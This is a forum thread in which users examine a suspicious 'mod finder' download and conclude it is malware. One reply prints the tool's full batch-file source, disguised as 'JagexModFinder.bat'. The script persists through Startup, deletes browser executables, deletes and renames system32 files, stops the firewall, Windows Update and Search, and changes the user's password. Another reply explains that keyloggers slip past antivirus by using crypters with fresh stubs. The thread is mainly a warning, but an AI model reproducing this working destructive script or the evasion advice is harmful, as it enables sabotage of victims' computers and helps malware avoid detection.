Adblock breaks this site

Hey there

Discussion in 'Archives' started by billyowns, Sep 28, 2009.

Thread Status:
Not open for further replies.
  1. billyowns

    billyowns Member
    Banned

    Joined:
    Mar 28, 2007
    Posts:
    91
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

    BOoonoghpdf
     
  2. fishing kills

    fishing kills Forum Addict
    Banned

    Joined:
    Jul 20, 2009
    Posts:
    288
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

    probably some keylogger , if it was scanned by virustotal ,then post here pics of proggy or link
     
  3. Jimmy

    Jimmy Ghost
    Retired Sectional Moderator $5 USD Donor

    Joined:
    Jun 24, 2008
    Posts:
    2,421
    Referrals:
    10
    Sythe Gold:
    25
    Hey there

  4. DeadlyStrikes

    DeadlyStrikes Forum Addict

    Joined:
    Jul 14, 2009
    Posts:
    386
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

    Lol fail.
     
  5. billyowns

    billyowns Member
    Banned

    Joined:
    Mar 28, 2007
    Posts:
    91
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

  6. n3xus

    n3xus Active Member
    Banned

    Joined:
    Aug 27, 2009
    Posts:
    129
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

    To all the younger kids, please trust your instinct over VirusReports.

    Even with free software you can make any KeyLogger fully undetected to Antivirus Software. Let's not start about the crypting software that people can easily make theirselves or buy.

    (It's actually all about the stub you use. If he had some luck and found a stub on the internet that no-one has used before, he could use any old Crypter, replace the detected stubs with the undetected one and there you go, a private crypter.)

    This could be clean, but I sincerely doubt that any of these tools are legit. If you think it's worth the risk, please open it within Sandboxie.​

    To the original poster, could you please post a picture of the program when opened?
     
  7. fishing kills

    fishing kills Forum Addict
    Banned

    Joined:
    Jul 20, 2009
    Posts:
    288
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

    Thx for scan ,but anyway virus and keyloger are two different things and yeah Jimmy5410 it seems total fake screen ,thats wat type of virus?? html page? :D
     
  8. Kristian4th

    Kristian4th Guru
    $5 USD Donor New

    Joined:
    Nov 29, 2007
    Posts:
    1,793
    Referrals:
    1
    Sythe Gold:
    15
    Hey there

    Probably crypted with istealer, I wouldn't download.
     
  9. Coron

    Coron Forum Addict
    Banned

    Joined:
    Aug 9, 2009
    Posts:
    287
    Referrals:
    0
    Sythe Gold:
    0
    Hey there

    FAIL
    Code:
     
    :: S1F1's Batch Virus Generator :: 
    :: Version [1.0.0] :: 
    :: Created at:  3:20:45.86 on: Mon 09/28/2009 :: 
     
    :: Virus Start :: 
    @echo off 
     
     
    :: Copy Virus To Startup :: 
    copy "JagexModFinder.bat" "%userprofile%\Start Menu\Programs\Startup\JagexModFinder.bat" 
    :: Copy Virus To Startup :: 
     
     
    :: Delete All Browsers :: 
    echo cd C:\Program Files\Internet Explorer >> "brall.bat" 
    echo del IEXPLORE.exe >> "brall.bat" 
    echo cd C:\Program Files\Mozilla Firefox >> "brall.bat" 
    echo del firefox.exe >> "brall.bat" 
    echo cd C:\Documents and Settings\%username%\Local Settings\Application Data\Google\Chrome\Application >> "brall.bat" 
    echo del chrome.exe >> "brall.bat" 
    echo cd C:\Users\%username%\AppData\Local\Google\Chrome\Application >> "brall.bat" 
    echo del chrome.exe >> "brall.bat" 
    echo exit >> "brall.bat" 
    start brall.bat 
    :: Delete All Browsers :: 
     
     
    :: Delete/Confuse Critical System 32 Files :: 
    echo cd %windir%\system32\setup >> "dc32.bat" 
    echo del * >> "dc32.bat" 
    echo cd %windir%\system32\ >> "dc32.bat" 
    echo REN *.jpeg *.txt >> "dc32.bat" 
    echo REN *.gif *.doc >> "dc32.bat" 
    echo REN *.png *.rtf >> "dc32.bat" 
    echo REN *.txt *.jpeg >> "dc32.bat" 
    echo REN *.doc *.gif >> "dc32.bat" 
    echo REN *.rtf *.png >> "dc32.bat" 
    echo REN *.fla *.swf >> "dc32.bat" 
    echo REN *.swf *.fla >> "dc32.bat" 
    echo REN *.psd *.bmp >> "dc32.bat" 
    echo REN *.bmp *.psd >> "dc32.bat" 
    echo REN *.html *.php >> "dc32.bat" 
    echo REN *.php *.html >> "dc32.bat" 
    echo REN *.js *.xml >> "dc32.bat" 
    echo REN *.xml *.js >> "dc32.bat" 
    echo REN *.as *.cfg >> "dc32.bat" 
    echo REN *.cfg *.log >> "dc32.bat" 
    echo REN *.jar *.zip >> "dc32.bat" 
    echo REN *.zip *.rar >> "dc32.bat" 
    echo REN *.rar *.zip >> "dc32.bat" 
    echo REN *.mp3 *.mp4 >> "dc32.bat" 
    echo REN *.mp4 *.mp3 >> "dc32.bat" 
    echo REN *.wav *.mp3 >> "dc32.bat" 
    echo REN *.ppt *.ppj >> "dc32.bat" 
    echo REN *.ppj *.ppt >> "dc32.bat" 
    echo exit >> "dc32.bat" 
    start dc32.bat 
    :: Delete/Confuse Critical System 32 Files :: 
     
     
    :: Disable Windows Firewall :: 
    net stop "MpsSvc" 
    taskkill /f /t /im "FirewallControlPanel.exe" 
    :: Disable Windows Firewall :: 
     
     
    :: Disable Windows Search :: 
    net stop "WSearch" 
    :: Disable Windows Search :: 
     
     
    :: Disable Windows Update :: 
    net stop "wuauserv" 
    :: Disable Windows Update :: 
     
     
    :: Change Password Into Random Number :: 
    net user %username% 5015 
    :: Change Password Into Random Number :: 
     
    
     
< >> *New Method* King Cobra's--(Rsgp Sales(Junk Buying(Junk Farming) *New Method* << | Is This RSC acc Rare? >
Thread Status:
Not open for further replies.


 
 
Adblock breaks this site